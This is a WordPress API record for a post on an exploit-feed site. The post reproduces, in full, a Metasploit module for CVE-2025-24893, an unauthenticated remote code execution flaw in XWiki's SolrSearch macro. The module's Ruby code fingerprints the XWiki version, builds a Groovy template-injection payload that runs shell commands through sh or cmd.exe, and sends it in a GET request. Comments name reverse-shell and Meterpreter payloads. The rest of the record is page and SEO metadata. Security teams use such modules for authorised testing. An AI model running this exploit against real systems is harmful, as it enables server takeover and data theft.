{"id":15381,"date":"2025-09-01T14:50:20","date_gmt":"2025-09-01T14:50:20","guid":{"rendered":"http:\/\/localhost\/?p=15381"},"modified":"2025-09-01T14:50:20","modified_gmt":"2025-09-01T14:50:20","slug":"remote-code-execution-vulnerability-in-xwiki-platform-cve-2025-24893","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=15381","title":{"rendered":"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-09-01T19:28:31&#8243;,&#8221;description&#8221;:&#8221;This module exploits a template injection vulnerability in the the XWiki Platform.           XWiki includes a macro&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-01T18:53:30&#8243;,&#8221;modified&#8221;:&#8221;2025-09-01T18:53:30&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-24893&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = ExcellentRanking\\n\\n  include Msf::Exploit::Remote::HttpClient\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits a template injection vulnerability in the the XWiki Platform.\\n          XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine.\\n          The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.\\n\\n          This vulnerability affects XWiki Platform versions \\u003e= 5.3-milestone-2 and \\u003c 15.10.11, and versions \\u003e= 16.0.0-rc-1 and \\u003c 16.4.1.\\n          Successful exploitation may result in the remote code execution under the privileges\\n          of the web server, potentially exposing sensitive data or disrupting survey operations.\\n\\n          An attacker can execute arbitrary system commands in the context of the user running the web server.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Maksim Rogov&#8217;, # Metasploit Module\\n          &#8216;John Kwak&#8217; # Vulnerability Discovery\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2025-24893&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/xwiki\/xwiki-platform\/security\/advisories\/GHSA-rr6p-3pfg-562j&#8217;]\\n        ],\\n        &#8216;Platform&#8217; =\\u003e [&#8216;unix&#8217;, &#8216;linux&#8217;, &#8216;win&#8217;],\\n        &#8216;Arch&#8217; =\\u003e [ARCH_CMD],\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;Unix Command&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e [&#8216;unix&#8217;, &#8216;linux&#8217;],\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n              &#8216;Type&#8217; =\\u003e :unix_cmd,\\n              &#8216;DefaultOptions&#8217; =\\u003e {\\n                # On Debian 9 curl is not installed by default\\n                &#8216;FETCH_COMMAND&#8217; =\\u003e &#8216;WGET&#8217;\\n              }\\n              # Tested with cmd\/unix\/reverse_bash\\n              # Tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n            }\\n          ],\\n          [\\n            &#8216;Windows Command&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e [&#8216;win&#8217;],\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n              &#8216;Type&#8217; =\\u003e :win_cmd\\n              # Tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp\\n            }\\n          ],\\n        ],\\n        &#8216;Payload&#8217; =\\u003e {\\n          &#8216;BadChars&#8217; =\\u003e &#8216;\\\\\\\\&#8217;\\n        },\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-02-20&#8217;,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION]\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Path to XWiki&#8217;, &#8216;\/&#8217;]),\\n      ]\\n    )\\n  end\\n\\n  def check\\n    print_status(&#8216;Extracting version&#8230;&#8217;)\\n\\n    res = send_request_cgi(\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;\/xwiki\/bin\/view\/Main\/&#8217;),\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;\\n    )\\n    return CheckCode::Unknown(&#8216;No response from target&#8217;) unless res\\u0026.code == 200\\n\\n    version_div = res.get_html_document.at(&#8216;div[id=\\&#8221;xwikiplatformversion\\&#8221;]&#8217;)\\n    return CheckCode::Safe(&#8216;Possibly not XWiki or incorrect path (version tag not found)&#8217;) unless version_div\\n\\n    version_match = version_div.text.match(\/XWiki.*?(\\\\d+\\\\.\\\\d+\\\\.\\\\d+)\/)\\n    unless version_match\\n      print_error(\\&#8221;#{peer} &#8211; Unable to extract version number\\&#8221;)\\n      return CheckCode::Detected(&#8216;XWiki detected, but version number missing or unrecognized&#8217;)\\n    end\\n\\n    version = Rex::Version.new(Regexp.last_match(1).to_s)\\n    print_status(\\&#8221;Extracted version: #{version}\\&#8221;)\\n\\n    if version.between?(Rex::Version.new(&#8216;5.3.0&#8217;), Rex::Version.new(&#8216;15.10.10&#8217;)) ||\\n       version.between?(Rex::Version.new(&#8216;16.0.0&#8217;), Rex::Version.new(&#8216;16.4.0&#8217;))\\n      return CheckCode::Appears(\\&#8221;Detected version #{version}, which is vulnerable\\&#8221;)\\n    end\\n\\n    return CheckCode::Safe(\\&#8221;Version #{version} appears safe\\&#8221;)\\n  end\\n\\n  def build_cmd\\n    print_status(&#8216;Building command for target&#8230;&#8217;)\\n\\n    if target[&#8216;Type&#8217;] == :unix_cmd\\n      cmd_array = \\&#8221;&#8216;sh&#8217;, &#8216;-c&#8217;, &#8216;#{payload.encoded}&#8217;\\&#8221;\\n    else\\n      cmd_array = \\&#8221;&#8216;cmd.exe&#8217;, &#8216;\/b&#8217;, &#8216;\/q&#8217;, &#8216;\/c&#8217;, &#8216;#{payload.encoded}&#8217;\\&#8221;\\n    end\\n\\n    print_good(&#8216;Command successfully built for target&#8217;)\\n\\n    return \\&#8221;{{async async=false}}{{groovy}}[#{cmd_array}].execute().text{{\/groovy}}{{\/async}}\\&#8221;\\n  end\\n\\n  def send_payload(cmd)\\n    print_status(&#8216;Uploading payload&#8230;&#8217;)\\n\\n    vars_get = {\\n      &#8216;media&#8217; =\\u003e &#8216;rss&#8217;,\\n      &#8216;text&#8217; =\\u003e cmd\\n    }\\n\\n    send_request_cgi({\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;\/xwiki\/bin\/get\/Main\/SolrSearch&#8217;),\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;vars_get&#8217; =\\u003e vars_get\\n    })\\n  end\\n\\n  def exploit\\n    cmd = build_cmd\\n    send_payload(cmd)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/xwiki_unauth_rce_cve_2025_24893.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/xwiki_unauth_rce_cve_2025_24893\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-09-01T19:28:31&#8243;,&#8221;description&#8221;:&#8221;This module exploits a template injection vulnerability in the the XWiki Platform. XWiki includes a macro&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-01T18:53:30&#8243;,&#8221;modified&#8221;:&#8221;2025-09-01T18:53:30&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-24893&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-15381","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=15381\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-09-01T19:28:31&#8243;,&#8221;description&#8221;:&#8221;This module exploits a template injection vulnerability in the the XWiki Platform. XWiki includes a macro&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-01T18:53:30&#8243;,&#8221;modified&#8221;:&#8221;2025-09-01T18:53:30&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-24893&#8243;],&#8221;sourceData&#8221;:&#8221;##n# This module...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=15381\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-01T14:50:20+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15381#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15381\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-\",\"datePublished\":\"2025-09-01T14:50:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15381\"},\"wordCount\":904,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15381#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15381\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15381\",\"name\":\"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-09-01T14:50:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15381#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15381\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15381#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=15381","og_locale":"en_US","og_type":"article","og_title":"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-09-01T19:28:31&#8243;,&#8221;description&#8221;:&#8221;This module exploits a template injection vulnerability in the the XWiki Platform. XWiki includes a macro&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-01T18:53:30&#8243;,&#8221;modified&#8221;:&#8221;2025-09-01T18:53:30&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-24893&#8243;],&#8221;sourceData&#8221;:&#8221;##n# This module...","og_url":"https:\/\/zero.redgem.net\/?p=15381","og_site_name":"zero redgem","article_published_time":"2025-09-01T14:50:20+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=15381#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=15381"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-","datePublished":"2025-09-01T14:50:20+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=15381"},"wordCount":904,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=15381#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=15381","url":"https:\/\/zero.redgem.net\/?p=15381","name":"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-09-01T14:50:20+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=15381#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=15381"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=15381#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)_MSF:EXPLOIT-MULTI-HTTP-XWIKI_UNAUTH_RCE_CVE_2025_24893-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15381"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15381\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}